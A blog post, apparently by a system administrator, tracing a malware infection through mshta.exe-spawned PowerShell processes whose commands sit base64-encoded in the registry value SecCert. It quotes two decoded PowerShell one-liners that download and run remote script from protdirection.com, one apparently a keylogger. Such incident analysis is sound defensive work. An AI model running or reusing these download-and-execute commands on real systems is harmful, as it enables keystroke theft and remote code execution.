Suspicious Activity via Powershell
Suspicious Activity via Powershell
I have been using Process Explorer quite a lot. Its kind of replacement of Task manager for me. Some day I may write about it or share the training module regarding the same however this post belongs to tell you all, how process explorer helped me in finding the suspicious activity via Powershell.
One of a machine was showing high CPU utilization for few days however at the time when I logged-in it was not showing high CPU utilization by PowerShell however Powershell instances were still running.
When I logged in , there were 3 instances of PowerShell running under mshta.exe in tree view structure which is Microsoft HTML Application Host . At times used by malwares for executing the program/applications however mshta.exe is a valid Microsoft executable.
Opening the properties of PowerShell and checked the command which was like this :
The command explains that powershell is trying to read the registry location HKLM\Software\Microsoft\Windows\CurrentVersion for the key SecCert . Value under SecCert
Now when we checked the properties of 2nd PowerShell process which is child of 1st PowerShell , it is evident that the PowerShell is executed with the key from registry .
So far it was evident that a script is running PowerShell to execute PowerShell command whose parameter is stored in registry. Now I checked the command for last PowerShell executable which was like
Now we have 2 [two] PowerShell command with BASE64 encoded information which is http transmission . On using online base64 decoder we found below 2[two] output
Output of 2nd PowerShell command
When we remove the white boxes we get the text as
“while(1){try{IEX(New-Object Net.WebClient).DownloadString(‘http://protdirection.com/’+([char](85-(-37))))}catch{Start-Sleep -s 10}}”
Now we are trying for the
The output file after removing the white boxes we get the command
“[System.Net.ServicePointManager]:: ServerCertificateValidationCallback = { $true }; IEX(New-Object Net.WebClient).DownloadString(‘https://protdirection.com/script?id=random&name=keylog’)”
Conclusion :
Above troubleshooting steps leads to a conclusion that somehow it’s infected by malware which is trying to download script from the location https://protdirection.com/script?id=random&name=keylog and then executing the script to capture the key stroke and sending to the network location.
Since we are not sure about the complete functionality of the script downloaded from the site, we can’t execute it from our end. If in-case someone wants to understand what exactly is happening you will need to capture PROCMON and Wireshark log while script execution.
Reference :
- To understand what Base64 is , here is the link https://en.wikipedia.org/wiki/Base64 .